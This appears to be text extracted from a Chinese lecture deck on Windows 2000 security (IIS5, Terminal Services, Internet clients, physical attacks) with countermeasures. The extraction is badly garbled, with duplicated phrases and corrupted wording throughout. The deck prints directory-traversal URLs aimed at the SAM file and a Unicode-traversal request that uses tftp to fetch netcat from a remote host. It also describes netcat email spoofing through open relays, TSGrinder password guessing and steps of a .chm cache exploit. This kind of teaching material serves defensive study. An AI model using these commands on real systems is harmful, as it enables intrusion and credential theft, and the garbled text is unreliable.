Windows2000系统安全课件

1、Windows2000Windows2000系统平安系统平安(2)-(2)-网络与信息平安网络与信息平安目目 录录IIS5的平安的平安终端效劳器平安终端效劳器平安Microsoft Internet 客户端客户端的平安的平安物理攻击物理攻击拒绝效劳攻击拒绝效劳攻击平安功能和工具平安功能和工具IIS5根底根本根底根本HTTPHTTP：基于文本的无状态文件传输协议：基于文本的无状态文件传输协议 虚拟目录：虚拟目录：files 映射到该系统磁盘的一个实际目录上，如映射到该系统磁盘的一个实际目录上，如c:inetpubwwwrootfiles对于效劳器而言那么形成如下的请求：对于效劳器而言那么形成如下

2、的请求： GET /files/index.html HTTP/1.0假设该文件存在，那么效劳器会向客户端推送该文件并在假设该文件存在，那么效劳器会向客户端推送该文件并在客户端的浏览器上显示；否那么会有各种错误代码客户端的浏览器上显示；否那么会有各种错误代码IIS5根底根底CGICGI：Common Gateway Interface，运行在效劳器上的应，运行在效劳器上的应用程序，能针对每个请求生成动态的内容，扩展了用程序，能针对每个请求生成动态的内容，扩展了Web功能功能调用调用CGI scripts/cgi.exe?var1+var2Windows中几乎所有的可执行程序都可以作为效劳器端的

3、中几乎所有的可执行程序都可以作为效劳器端的CGI应用程序来执行应用程序来执行其中其中cmd.exe经常被作为寻找的目标经常被作为寻找的目标IIS5根底根底ASP和和ISAPIASP：Active Server Pages ISAPI: Interface Server Application Programming Interface调用调用ASP scripts/script.asp?var1=x&var2=y调用调用ISAPI :/ /isapi.dll? var1&var2HTTP攻击手段攻击手段使用使用./进行文件系统遍历进行文件系统遍历U

4、RL的十六进制编码的十六进制编码使用使用 ./ 进行文件系统遍历进行文件系统遍历 : / / i n f o s e c . p k u . e d u /././././winnt/secret.txt通常是在目录上设置不当的通常是在目录上设置不当的NTFS访问控制列表所导访问控制列表所导致的致的 : / / i n f o s e c . p k u . e d u /././././winnt/repair/samURL的十六进制编码的十六进制编码Http允许允许URL中使用十六进制编码形式输入字符串中使用十六进制编码形式输入字符串利用利用URL的十六进制编码攻击的十六进制编码攻击 :/

5、 /././winnt/repair/sam :/ 2F 2E 2E 2F 2E 2E 2F winnt/repair/sam能防止入侵检测系统的检测，或可以导致应用程序错误处理输能防止入侵检测系统的检测，或可以导致应用程序错误处理输入入IIS5缓冲区溢出缓冲区溢出IPP缓冲区溢出缓冲区溢出索引效劳索引效劳ISAPI扩展缓冲区溢出扩展缓冲区溢出Code Red蠕虫蠕虫ida/idq缓冲区溢出缓冲区溢出FrontPage 2000效劳器扩展缓冲区溢出效劳器扩展缓冲区溢出平安对策平安对策在系统驱动器之外的驱动器上安装在系统驱动器之外的驱动

6、器上安装Web文件夹文件夹Web效劳器所在的卷应使用效劳器所在的卷应使用NTFS并谨慎设置并谨慎设置ACL移动、删除或改名可能被利用的可执行文件：移动、删除或改名可能被利用的可执行文件：cacls,xcacls在效劳器的在效劳器的Write和和Execute ACL中删除中删除Everyone和和Users Group掌握对日志中攻击标志的分析掌握对日志中攻击标志的分析将文件写入将文件写入Web效劳器效劳器如在目标机上建立如在目标机上建立tftp效劳器，然后上载文件：效劳器，然后上载文件： GET /scripts/.%c0%af./winnt/system32/tftp.exe? “-i+1

7、1+GET+nc.exe c:nc.exe HTTP/1.0 将将netcat写入到写入到C:，因为默认情况下所有用户，因为默认情况下所有用户对对C:具有写权限具有写权限如将目标机器上如将目标机器上cmd.exe改名为改名为cmdl.exe GET /scripts/.%c0%af./winnt/system32/cmd.exe?+copy+ c:winntsystem32cmd.exe+c:cmdl.exe HTTP/1.0其它自动上载工具：如其它自动上载工具：如unicodeloader等等通过通过IIS5提升权限提升权限通 过通 过 I n P r o c e s

8、 s l s a p i A p p s 利 用利 用RevertToSelf 安装安装MS01-026补丁可以解决补丁可以解决源代码泄漏攻击源代码泄漏攻击起因起因IIS中的程序缺陷中的程序缺陷低劣的低劣的Web编程技术编程技术常见的漏洞常见的漏洞+.htr(ism.dll)Webhits(webhits.dll)Translate: f (WebDAV, ext.dll)WebDAV目录列表目录列表 ext.dll)Web效劳器平安评估工具效劳器平安评估工具Stealth HTTP Scanner SSLProxy Achilles Wfetch WhiskerWeb效劳器平安忠告效劳器平安

9、忠告在路由器、防火墙或其它位于在路由器、防火墙或其它位于Web效劳器周边位置的设备上效劳器周边位置的设备上应用网路级的访问控制应用网路级的访问控制在主机级，阻塞在主机级，阻塞Web效劳器上所有不必要的流入和流出连接效劳器上所有不必要的流入和流出连接随时安装热修复：随时安装热修复：删除不必要的脚本映射和不使用的删除不必要的脚本映射和不使用的ISAPI应用程序应用程序DLL禁用不必要的效劳禁用不必要的效劳在应用在应用Web效劳之前，强烈推荐使用效劳之前，强烈推荐使用Security Template来来对其进行配置对其进行配置Web效劳器平安忠告效劳器平安忠告在系统卷之外建立一个独立的卷来存放在系

10、统卷之外建立一个独立的卷来存放Web根目录根目录Web效劳器所在的卷应使用效劳器所在的卷应使用NTFS文件系统，明确的设置文件系统，明确的设置ACL删除删除Everyone、Users和其它非特权组所在目录上的写文件和其它非特权组所在目录上的写文件和执行文件权限和执行文件权限不要将私有数据保存在不要将私有数据保存在ASP文件或包含有文件中文件或包含有文件中停止停止Administration Web站点，删除站点，删除IISAdmin和和IISHelp虚拟目录以及它们对应的真实目录虚拟目录以及它们对应的真实目录 目目 录录IIS5的平安的平安终端效劳器平安终端效劳器平安Microsoft In

11、ternet 客户端客户端的平安的平安物理攻击物理攻击拒绝效劳攻击拒绝效劳攻击平安功能和工具平安功能和工具TSWindows 2000提供了交互式的图形化远程提供了交互式的图形化远程shell，称为终端，称为终端效劳效劳(Terminal Service，TS)，适用于远程管理或应用程序，适用于远程管理或应用程序共享共享引用引用 microsoft 的说法，的说法，“Windows 2000终端效劳终端效劳使你能够从各种设备上，通过几乎任何类型的网络连接远程的使你能够从各种设备上，通过几乎任何类型的网络连接远程的基于基于Windows 2000的效劳器，并在其上远程执行应用程序的效劳器，并在其

12、上远程执行应用程序TSTS紧密集成在操作系统内部，免费提供远程管理模紧密集成在操作系统内部，免费提供远程管理模式式(最多有两个同时连接的会语以及一个控制台最多有两个同时连接的会语以及一个控制台)TS 可以在你和效劳器之间提供不同的认证和加密方可以在你和效劳器之间提供不同的认证和加密方法。对法。对Windows 2000来说，终端效劳器正在逐渐来说，终端效劳器正在逐渐成为与成为与UNIX世界中的世界中的SSH一样重要的图形化产品一样重要的图形化产品TS的代价的代价 在本节中，我们将从平安的角度来考查TS的根本功能、如何识别和枚举TS、解决不合理的TS实现的问题、的针对TS的攻击，以及在网络环境中

13、保护和管理TS的根本知识TS组件组件效劳器效劳器远程桌面协议远程桌面协议(Remote Desktop Protocol，RDP)客户端客户端TS效劳器效劳器TS集成在所有集成在所有Windows 2000效劳器中，通过控制面效劳器中，通过控制面板中的板中的Windows组件功能可以很容易地启用和禁用组件功能可以很容易地启用和禁用在以管理模式安装时，效劳器是标准的组件；当作为远在以管理模式安装时，效劳器是标准的组件；当作为远程应用程序效劳器时，它需要额外的授权费用和架构程应用程序效劳器时，它需要额外的授权费用和架构效劳器的默认监听端口为效劳器的默认监听端口为TCP 3389 (稍后将会介绍自稍

14、后将会介绍自行指定端口是很容易的行指定端口是很容易的)远程桌面协议远程桌面协议(RDP)在客户端和效劳器之间的数据传输是通过在客户端和效劳器之间的数据传输是通过Microsoft的的基于基于TCP的远程桌面协议的远程桌面协议(RDP-5)进行的进行的RDP提供了三层加密以确保点对点数据传输的平安性：提供了三层加密以确保点对点数据传输的平安性：40、56或或128位位RC4与与Windows NT版本的版本的RDP-4相比，相比，Windows 2000提供了更多的根本功能，可以在大多数的网络提供了更多的根本功能，可以在大多数的网络环境中高效的使用环境中高效的使用客户端客户端通过通过MS安装程序

15、安装程序(MSI)软件包安装的独立的软件包安装的独立的16位或位或32位可执位可执行文件行文件终端效劳高级客户端终端效劳高级客户端(Terminal Services Advanced Alient，TSAC)，基于，基于Win32的的ActiveX控件，可以在控件，可以在Web页面中使页面中使用用MMC管理单元管理单元 尽管它们互相之间存在明显的区别，但各种不同的客户端尽管它们互相之间存在明显的区别，但各种不同的客户端都用完全相同的方法来实现都用完全相同的方法来实现RDP。因此，尽管它们看起来似。因此，尽管它们看起来似乎不一样，但所有的乎不一样，但所有的TS客户端在与效劳器进行对话时都以完客

16、户端在与效劳器进行对话时都以完全相同的方式进行操作全相同的方式进行操作修改修改TS监听端口效劳器监听端口效劳器端端通过修改下面的注册表键值，通过修改下面的注册表键值，TS的默认端口可以重的默认端口可以重新指定新指定 HKLMSystemCurrentControlSetControl Terminal Server WinStationsRDP-Tcp键值：键值：PortNumber REG_DWORD=3389修改修改TS监听端口客户端监听端口客户端第一步是在第一步是在TS客户端连接管理器中与目标主机建立连接客户端连接管理器中与目标主机建立连接一旦创立了一个连接之后，选定该连接并从一旦创立了

17、一个连接之后，选定该连接并从File菜单中选菜单中选择择Export，将全部配置设置保存到以一个，将全部配置设置保存到以一个CNS为扩展名为扩展名的文本文件中去的文本文件中去使用文本编辑器翻开这个文件，将使用文本编辑器翻开这个文件，将Server Port修改为在修改为在效劳器上指定端口，如下例所示效劳器上指定端口，如下例所示(自定义连接端口为自定义连接端口为7777) 修改修改TS监听端口客户端监听端口客户端CorpTermServWinPosStr=0,2,0,0,941,639Expand=1Smooth Scrolling=0Shadow Bitmap Enabled=1Dedicat

18、ed Terminal=0Server Port=7777Enable Mouse=1etc. 识别和查找识别和查找TS3389端口扫描端口扫描TSProbeTSEnum 攻击攻击TS密码猜测攻击密码猜测攻击用户权限提升用户权限提升畸形畸形RDP拒绝效劳攻击拒绝效劳攻击 密码猜测攻击密码猜测攻击-TSGrinder.exeT S 登 录 等 价 于 真 正 的 交 互 式 登 录 ， 因 此 对 真 正 的登 录 等 价 于 真 正 的 交 互 式 登 录 ， 因 此 对 真 正 的Administrator账户是不能设置锁定阈值的。这意味着在账户是不能设置锁定阈值的。这意味着在启用了启用了T

19、S效劳的情况下，对密码猜测攻击来说，本地效劳的情况下，对密码猜测攻击来说，本地Administrator账户是一个最易受攻击的目标账户是一个最易受攻击的目标Tim Mullen开发了开发了TSGrinder的工具，它能够通过的工具，它能够通过TS对对本地本地Administrator账户进行字典攻击账户进行字典攻击密码猜测攻击密码猜测攻击-TSGrinder.exeTSGrinder使用使用TS的的ActiveX控件来进行攻击。尽管这个控件来进行攻击。尽管这个ActiveX控件经过特殊的设计可以拒绝对密码方法的脚本访问，控件经过特殊的设计可以拒绝对密码方法的脚本访问，但 通 过但 通 过 C

20、+ + 中 的中 的 v t a b l e 绑 定 仍 然 可 以 访 问绑 定 仍 然 可 以 访 问ImsTscNonScriptable接口方法。这允许为该控件编写自定接口方法。这允许为该控件编写自定义的接口，于是攻击者就可以对义的接口，于是攻击者就可以对Administrator账户进行密码账户进行密码猜测，直至猜测出密码猜测，直至猜测出密码 hammerofgod 上提供下载上提供下载 密码猜测攻击的防御密码猜测攻击的防御推荐将本地推荐将本地Administrator账户改名账户改名防御防御TS密码猜测攻击的另一种有趣的方法是为密码猜测攻击的另一种有趣的方法是为Windows登录窗

21、口制作一个自定义的法律声明，通过登录窗口制作一个自定义的法律声明，通过添加或编辑如下的注册表键值就可以实现：添加或编辑如下的注册表键值就可以实现：HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinLogon 用户权限提升用户权限提升推荐实现推荐实现Windows 2000 Resource Kit中的一些中的一些关键功能关键功能其中最重要的是，其中最重要的是，“Appsec可以使管理员能够限可以使管理员能够限制用户只能运行特定的应用程序制用户只能运行特定的应用程序这能够减小攻击者在获取本地用户访问之后进行权限这能够减小攻击者在获取本地用户访问之后进行

22、权限提升攻击的危险提升攻击的危险 IME远程远程Root获取获取输入法编辑器输入法编辑器(Input Method Editor，IME)漏洞，这个漏洞漏洞，这个漏洞导致可以不用提供任何凭据就能通过导致可以不用提供任何凭据就能通过TS的认证的认证IME用来将标准的用来将标准的101键键盘映射到某种语言中的大量可用字键键盘映射到某种语言中的大量可用字符，例如日语、中文和韩国语都需要符，例如日语、中文和韩国语都需要IME。虽然。虽然IME通常在本通常在本地用户的上下文中进行正常操作，但登录时，地用户的上下文中进行正常操作，但登录时，IME却在却在SYSTEM上下文中运行。这使得通过远程效劳器的登录

23、屏幕上下文中运行。这使得通过远程效劳器的登录屏幕运行精心设计的命令成为可能运行精心设计的命令成为可能IME对策对策只有简体中文版系统或在初始安装过程中安装了简体只有简体中文版系统或在初始安装过程中安装了简体中文中文IME的系统才会有这个漏洞的系统才会有这个漏洞Microsoft发布的公告发布的公告MS00-069和补丁能够为所和补丁能够为所有受影响的版本解决这个问题有受影响的版本解决这个问题畸形畸形RDP拒绝效劳拒绝效劳2001年年1月，月，Yoichi Ubukata和和Yoshihiro Kawabata发现了发现了RDP中的一个漏洞，这个漏洞可能中的一个漏洞，这个漏洞可能导致拒绝效劳的情

24、况出现。如果攻击者发送一种畸形导致拒绝效劳的情况出现。如果攻击者发送一种畸形的报文，它将使的报文，它将使RDP瘫痪。这种攻击会导致当前正在瘫痪。这种攻击会导致当前正在进行的全部工作丧失，并且需要重新启动系统才能恢进行的全部工作丧失，并且需要重新启动系统才能恢复效劳复效劳Microsoft发布了一个补丁发布了一个补丁(MS01-006)，通过修改，通过修改终端效劳器效劳使它正确地处理数据，从而消除这个终端效劳器效劳使它正确地处理数据，从而消除这个漏洞漏洞目目 录录IIS5的平安的平安终端效劳器平安终端效劳器平安Microsoft Internet 客户端客户端的平安的平安物理攻击物理攻击拒绝效劳

25、攻击拒绝效劳攻击平安功能和工具平安功能和工具攻击类型攻击类型缓冲区溢出，可被用来执行任意的代码而无需与用户进行任何缓冲区溢出，可被用来执行任意的代码而无需与用户进行任何交互交互通过欺骗、强制或暗中执行命令，使用户运行由攻击者预先选通过欺骗、强制或暗中执行命令，使用户运行由攻击者预先选择的可执行内容。这种方法有以下一些变化：择的可执行内容。这种方法有以下一些变化： 巧妙伪装的、看起来无害的电子邮件附件巧妙伪装的、看起来无害的电子邮件附件 嵌入在嵌入在HTML Web页面或电子邮件中的可执行内页面或电子邮件中的可执行内容容 活动内容技术的漏洞导致非法代码的执行活动内容技术的漏洞导致非法代码的执行

26、ActiveX控件，尤其是那些标记有控件，尤其是那些标记有“可以在脚本中可以在脚本中平安使用的控件平安使用的控件 Java虚拟机的程序缺陷虚拟机的程序缺陷(Brown Orifice)攻击类型攻击类型访问脚本访问脚本/自动化接口，例如自动化接口，例如Outlook地址簿蠕虫地址簿蠕虫写本地文件，通常是在可执行的目录中；经常通过临时目录写本地文件，通常是在可执行的目录中；经常通过临时目录或缓存位置的不适当泄露发生。一旦在本地写入文件，它就或缓存位置的不适当泄露发生。一旦在本地写入文件，它就可以执行并运行在本地计算机平安区域的上下文中，从而是可以执行并运行在本地计算机平安区域的上下文中，从而是完全

27、受到信任的完全受到信任的读取本地文件，例如通过读取本地文件，例如通过HTML跨帧导航问题或使用跨帧导航问题或使用IFRAME。这种技术的一个常见结果是从。这种技术的一个常见结果是从Web浏览器的浏览器的cookie中获取用户的密码数据中获取用户的密码数据调用客户端出站连接调用客户端出站连接恶意恶意Web页面页面客户端的一种最常见形式是在客户端的一种最常见形式是在Internet上部署恶意的上部署恶意的Web效劳器，存放经过精心设计的内容，用来诱骗用户的数据效劳器，存放经过精心设计的内容，用来诱骗用户的数据这种方法的有效性取决于提高恶意这种方法的有效性取决于提高恶意Web站点站点/页面的访问量，

28、页面的访问量，这通常是通过电子邮件或新闻组这通常是通过电子邮件或新闻组/列表文章来进行的列表文章来进行的恶意恶意E-mail由于由于HTML功能的多样性功能的多样性(嵌入小程序或控件、活动脚本、跨帧浏览、内联嵌入小程序或控件、活动脚本、跨帧浏览、内联帧、帧、cookie解析等等解析等等)，HTML电子邮件成为理想的攻击媒介电子邮件成为理想的攻击媒介由于接收端的漏洞导致这样的问题，由于接收端的漏洞导致这样的问题，Microsoft虽然备受指责，然而通过虽然备受指责，然而通过Outlook或或Outlook Express(OE)这样的程序发送恶意编写的这样的程序发送恶意编写的HTML却十却十分困

29、难。这些图形化的电子邮件客户端不允许对邮件消息的内容进行直接分困难。这些图形化的电子邮件客户端不允许对邮件消息的内容进行直接的操作，而为实现攻击目的却需要这样做的操作，而为实现攻击目的却需要这样做如果要在如果要在Windows上模拟这种命令行功能，可以通过命令行提示符直接向上模拟这种命令行功能，可以通过命令行提示符直接向简单邮件传输协议简单邮件传输协议(Simple Mail Transfer Protocol，SMTP)效劳器手动效劳器手动发送消息。最正确的方法是将适当的发送消息。最正确的方法是将适当的SMTP命令和数据写入到一个文本文命令和数据写入到一个文本文件中，然后通过管道输入给件中，

30、然后通过管道输入给netcatEmail Hacking首先，将所需的首先，将所需的SMTP命令和消息数据写入到一个文件中命令和消息数据写入到一个文件中helo somedomain mail from: rcpt to: datasubject: Read this!Importance: highMIME-Version: 1.0Content-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bitHello World!.quitEmail Hacking然后在命令行中将这个文件通过管道传递给然后在命令行中将这个文

31、件通过管道传递给netcat，而，而netcat那么应该指那么应该指向适当的邮件效劳器的向适当的邮件效劳器的SMTP监听端口监听端口25，例如：，例如：C:type malicious.txt | nc -vv 25Email Hacking恶意的攻击者通常会选择一些提供无限制的恶意的攻击者通常会选择一些提供无限制的SMTP消息中继的不引人注消息中继的不引人注意的邮件效劳器，而且会尽可能隐藏他们自己的源意的邮件效劳器，而且会尽可能隐藏他们自己的源IP地址，这样就不可地址，这样就不可能通过邮件效劳器的日志来追查到他们能通过邮件效劳器的日志来追查到他们这样的这样的“开放式开放式SMTP中继通常被垃

32、圾邮件所利用，在中继通常被垃圾邮件所利用，在Usenet的讨的讨论或上经常可以找到这样的效劳器论或上经常可以找到这样的效劳器Email Hacking如果希望随如果希望随HTML格式的消息发送一个附件，那么必须向消息中添加另一格式的消息发送一个附件，那么必须向消息中添加另一个个MIME局部，根据局部，根据MIME标准标准(RFC 2045-49)用用Base64格式对附件进格式对附件进行编码行编码用以自动完成这项工作的最正确工具是用以自动完成这项工作的最正确工具是John G. Myers的的mpack。mpack能够自动添加正确的能够自动添加正确的MIME头，这样它的输出就可以直接发送给头，

33、这样它的输出就可以直接发送给SMTP效劳效劳器器下面的例子使用下面的例子使用mpack对一个名为对一个名为plant.txt的文件进行编码，输出到文件的文件进行编码，输出到文件plant.mim中。可选的中。可选的-s参数用以指定消息的主题行参数用以指定消息的主题行 C:mpack -s Nasty-gram -o plant.mim plant.txtEmail Hacking下面将下面将MIME局部插入到现有的局部插入到现有的HTML格式的消息中去格式的消息中去对前面的对前面的malicious.txt来说，使用来说，使用“Content-Type:一行中自定义一行中自定义的的MIME边界

34、来划分该消息。边界来划分该消息。MIME边界以两个连字符开始，结束边界边界以两个连字符开始，结束边界以两个连字符为后缀。还要注意嵌套的以两个连字符为后缀。还要注意嵌套的“multipart/alternativeMIME局部局部(boundary2)，这样，这样Outlook接收者就能够正确地对接收者就能够正确地对HTML消息正文进行解码消息正文进行解码一定要十分注意换行的位置，因为一定要十分注意换行的位置，因为MIME的解析根据它们的位置有着的解析根据它们的位置有着很大的不同。这个消息的重要性被设置为很大的不同。这个消息的重要性被设置为high(高高)，这是诱使受害者，这是诱使受害者上当受骗

35、的一个手段上当受骗的一个手段Email HackingEmail Hacking使用管道将这个文件输入给使用管道将这个文件输入给netcat，并发送给开放的，并发送给开放的SMTP效劳器，效劳器，就能够向发送一封就能够向发送一封HTML格式的消息，并包含附件格式的消息，并包含附件plant.txt要更好地理解多局部消息中的要更好地理解多局部消息中的MIME边界，参考边界，参考RFC 2046的第的第5.1.1节。在节。在Outlook Express中对收到的消息进行研究，也可以进一中对收到的消息进行研究，也可以进一步了解其格式步了解其格式单击单击Properties | Details |

36、Message Source就可以查看原始数据就可以查看原始数据(Outlook不允许查看全部的原始不允许查看全部的原始SMTP数据数据)缓冲区溢出缓冲区溢出如果在每天使用的软件如果在每天使用的软件电子邮件客户端中存在缓冲区溢出的漏洞，那么电子邮件客户端中存在缓冲区溢出的漏洞，那么问题就很可怕了。在漏洞得到修正之前，任何使用存在问题的软件的人都将问题就很可怕了。在漏洞得到修正之前，任何使用存在问题的软件的人都将成为目标成为目标2000年年7月月18日；日；Underground Security Systems Research(USSR)公布了公布了GMT令牌缓冲区溢出漏洞，令牌缓冲区溢出漏

37、洞，Outlook和和Outlook Express(OE)的用户的用户随之发现了这一点。通过将随之发现了这一点。通过将GMT令牌放在邮件消息的日期字段中并写入一个令牌放在邮件消息的日期字段中并写入一个超长的值，超长的值，Outlook和和OE就会在就会在POP3和和IMAP4下载这样的消息时崩溃。下载这样的消息时崩溃。如果可以发送精心设计的日期字段，攻击者选定的程序就可以封装在如果可以发送精心设计的日期字段，攻击者选定的程序就可以封装在GMT值值中并执行中并执行Outlook用户需要预览、阅读、回复或转发这样的消息；用户需要预览、阅读、回复或转发这样的消息；OE用户简单地翻开用户简单地翻开含

38、有该消息的文件夹，在消息处理时就会自动发生含有该消息的文件夹，在消息处理时就会自动发生OE就会永久性地崩就会永久性地崩溃，除非去除邮箱溃，除非去除邮箱Outlook/OE vCard缓冲区溢缓冲区溢出出这个问题最早由这个问题最早由Joel Moses发现，通过翻开特定字段中含发现，通过翻开特定字段中含有大量文本数据的有大量文本数据的vCards，就可以利用，就可以利用Internet Explorer中的缓冲区溢出中的缓冲区溢出vCards是是1996年创造的一种电子名片格式，年创造的一种电子名片格式，1998年进年进入入RFCvCards以以.vcf为文件扩展名。因为在读取为文件扩展名。因为

39、在读取vCards时必须解时必须解析大量的数据字段，因此它们成为缓冲区溢出攻击的最正析大量的数据字段，因此它们成为缓冲区溢出攻击的最正确目标确目标Outlook/OE vCard缓冲区溢缓冲区溢出出尽管受害者必须显式地运行尽管受害者必须显式地运行vCard，但由于它是一种方便，但由于它是一种方便的个人数据交换格式，因此大多数人都不会有任何的犹豫的个人数据交换格式，因此大多数人都不会有任何的犹豫在默认情况下，在默认情况下，Outlook会直接从邮件附件运行会直接从邮件附件运行vCards而而不对用户进行提示，除非安装了不对用户进行提示，除非安装了Office平安更新。在直接平安更新。在直接翻开磁

40、盘上的翻开磁盘上的.vcf文件时，不会出现提示文件时，不会出现提示Outlook/OE vCard缓冲区溢缓冲区溢出出vCards采用非常简单的采用非常简单的ASCII结构，下面的例子是一个名结构，下面的例子是一个名为为John Doe.vcf的的vCard(为了简明起见，删除了一些可为了简明起见，删除了一些可选的字段选的字段)：Outlook/OE vCard缓冲区溢缓冲区溢出出如果可选的如果可选的BDAY(生日生日)字段超过字段超过55个字符，运行它就会导致个字符，运行它就会导致Outlook终止并溢出终止并溢出含有大量文本数据的含有大量文本数据的EMAIL字段也会导致同样的结果，而在字段

41、也会导致同样的结果，而在N(姓名姓名)字段中填入大量的文本数据会导致字段中填入大量的文本数据会导致Outlook占用占用99%的系统的系统CPU资资源源主要的问题似乎在于主要的问题似乎在于Outlook的地址簿，它在试图从的地址簿，它在试图从vCard导入超长导入超长的字段时发生阻塞。用户将存在问题的的字段时发生阻塞。用户将存在问题的vCard复制到他们的复制到他们的Outlook/OE的联系人文件夹中，通过的联系人文件夹中，通过Windows资源管理器，或通资源管理器，或通过嵌入在过嵌入在Web页面或电子邮件消息中的链接翻开它时，也会发生问题页面或电子邮件消息中的链接翻开它时，也会发生问题其

42、它缓冲区溢出其它缓冲区溢出Windows媒体播放器媒体播放器.asx缓冲区溢出缓冲区溢出Georgi Guninski和和Richard Smith发现的发现的ActiveX“Safe for Scripting脚本平安问题脚本平安问题Access数据库实例化数据库实例化IE 5中执行中执行VBA代码代码写本地文件写本地文件将文件写入本地磁盘，如果能够写入任意的文件然后又能够执行它们，将文件写入本地磁盘，如果能够写入任意的文件然后又能够执行它们，那么麻烦就大了。如果文件已经写入到磁盘上，那么只有文件系统那么麻烦就大了。如果文件已经写入到磁盘上，那么只有文件系统ACL和它们与用户账户权限的交集能

43、够确定哪些能够被执行而哪些不和它们与用户账户权限的交集能够确定哪些能够被执行而哪些不能，因此只要过了第一关，第二步就很容易了。能，因此只要过了第一关，第二步就很容易了。这种攻击的一种聪明的变种是识别磁盘上可以可靠地写入数据的静态这种攻击的一种聪明的变种是识别磁盘上可以可靠地写入数据的静态位置位置例如，例如，Internet临时缓存文件的名称和位置是可以预测的。临时缓存文件的名称和位置是可以预测的。这使得攻击者可以实现这使得攻击者可以实现“选定文件内容攻击，在文件里面他们可以选定文件内容攻击，在文件里面他们可以精心设计恶意的脚本或是其他提交给精心设计恶意的脚本或是其他提交给Internet客户端

44、的指令，以便可客户端的指令，以便可以写入到这些可预测的位置之一。一旦完成了这一步，那么通过以写入到这些可预测的位置之一。一旦完成了这一步，那么通过IFRAME或其他的技术从的位置执行这些脚本就很容易了或其他的技术从的位置执行这些脚本就很容易了执行被写入临时执行被写入临时Internet缓存的缓存的.chm文文件件Georgi Guninski的第的第28号公告描述了这个漏洞。它涉及号公告描述了这个漏洞。它涉及到到4个根本的步骤，它们都是在个根本的步骤，它们都是在IE或或Outlook/OE中装载中装载HTML时进行的：时进行的：1.使用一些使用一些HTML代码，向代码，向IE的的Interne

45、t临时文件缓存临时文件缓存中写入一系列相同的经过特殊设计的已编译中写入一系列相同的经过特殊设计的已编译HTML帮助文帮助文件件(.chm)2.从第一份从第一份HTML文档中，装载第二份文档中，装载第二份HTML文档，第文档，第二份文档位于另一台效劳器上，该效劳器的名称与存放父二份文档位于另一台效劳器上，该效劳器的名称与存放父文档的效劳器的名称不同文档的效劳器的名称不同3.识别识别Internet临时缓存文件夹的位置临时缓存文件夹的位置4.在查点出的缓存文件夹中执行在查点出的缓存文件夹中执行.chm文件文件通用对策通用对策仔细配置出站网关访问控制，阻塞除由公司策略明显允许仔细配置出站网关访问控制

46、，阻塞除由公司策略明显允许的通信之外的全部通信。客户端攻击的最可怕的一种可能的通信之外的全部通信。客户端攻击的最可怕的一种可能就是调用与恶意效劳器之间的出站连接在不平安的协议上，就是调用与恶意效劳器之间的出站连接在不平安的协议上，例如例如telnet或或SMB不要在重要的效劳器不要在重要的效劳器上读取邮件或浏览上读取邮件或浏览Web不要在重要的效劳器上安装不要在重要的效劳器上安装Microsoft Office在浏览在浏览Web和读取邮件时，尽可能使用非特权用户身份，和读取邮件时，尽可能使用非特权用户身份，而不要用而不要用Administrator通用对策通用对策坚持原那么坚持原那么不要点击不

47、可信的链接或查看不可信的电子邮不要点击不可信的链接或查看不可信的电子邮件附件，最好将其删除件附件，最好将其删除一定要及时升级一定要及时升级Internet客户端软件。目前，使用客户端软件。目前，使用Windows更新站点来自动检测和安装你需要的补丁更新站点来自动检测和安装你需要的补丁(Microsoft方案在方案在2001年夏天推出一个新的工具，以帮助用户确定他们的年夏天推出一个新的工具，以帮助用户确定他们的IE/OE和和Outlook需要安装哪些补丁需要安装哪些补丁)。在编写本书时，。在编写本书时，IE 5.5是是Microsoft的核心的核心Internet客户端的最新版本，并且客户端的最

48、新版本，并且Service Pack 1也已经发布。在也已经发布。在IE中，检查中，检查Help|About以查看已经安以查看已经安装了哪些补丁，并且确保你正在使用装了哪些补丁，并且确保你正在使用128位加密强度位加密强度通用对策通用对策不要忘了及时到不要忘了及时到Office更新站点上对更新站点上对Office进行更新。特别进行更新。特别的，确保你已经安装了的，确保你已经安装了Outlook电子邮件平安更新电子邮件平安更新适当的设置适当的设置IE的的 Security Zone，包括禁用，包括禁用Restricted Site区域中的全部功能，然后配置区域中的全部功能，然后配置Outlook

49、/OE使用该区域使用该区域读取电子邮件读取电子邮件将平安策略中的将平安策略中的Windows 2000 LAN Manager认证级别认证级别设置为设置为Send NTLMv2 Response Only。这能够降低对。这能够降低对SMB认证进行窃听攻击的危险认证进行窃听攻击的危险(但不能阻止恶意效劳器和但不能阻止恶意效劳器和MITM攻击攻击)通用对策通用对策禁用禁用Windows 2000 telnet客户端的客户端的NTLM认证认证(在命令在命令行中执行行中执行telnet命令，然后输入命令，然后输入unset ntlm，然后用，然后用quit退出退出)。这能够防止在对。这能够防止在对te

50、lnet:/链接进行反响时链接进行反响时NTLM凭据在网络上传播凭据在网络上传播在所有的在所有的Office应用程序的应用程序的Tools | Macro | Security中中将宏平安性设置为将宏平安性设置为High(高高)。这有助于防止。这有助于防止Office文档中文档中的恶意宏脚本进行的攻击的恶意宏脚本进行的攻击通用对策通用对策在客户端和邮件效劳器上，及时更新防病毒标识数据库在客户端和邮件效劳器上，及时更新防病毒标识数据库部署基于网关和邮件效劳器的过滤系统，剔除部署基于网关和邮件效劳器的过滤系统，剔除Web页面页面和电子邮件中的恶意内容和电子邮件中的恶意内容如果这些提示没能使你感到平

51、安，那么不要再使用如果这些提示没能使你感到平安，那么不要再使用Microsoft Internet客户端客户端(如果你运行如果你运行Windows 2000，那么实际上这是不可能的，那么实际上这是不可能的)目目 录录IIS5的平安的平安终端效劳器平安终端效劳器平安Microsoft Internet 客户端客户端的平安的平安物理攻击物理攻击拒绝效劳攻击拒绝效劳攻击平安功能和工具平安功能和工具物理攻击物理攻击如果入侵者能够不受限制地在物理上访问一台如果入侵者能够不受限制地在物理上访问一台Windows 2000系统，那么他们如何进行攻击呢？系统，那么他们如何进行攻击呢？本节将从物理的角度探讨攻击

52、者如何从本节将从物理的角度探讨攻击者如何从Windows 2000获取数据，通常的方法是引导到另外的操作系统并在离获取数据，通常的方法是引导到另外的操作系统并在离线的状态下对系统的属性进行编辑线的状态下对系统的属性进行编辑对对SAM进行离线攻击进行离线攻击破解通常依赖于获取破解通常依赖于获取NT/2000的密码数据库的密码数据库平安平安账户管理器账户管理器(Security Accounts Manager，SAM)文件文件通过离线攻击，通过离线攻击，SAM的内容也可以被坏人获取，只需引的内容也可以被坏人获取，只需引导到另一种操作系统，然后将导到另一种操作系统，然后将SAM复制到可移动媒体或复

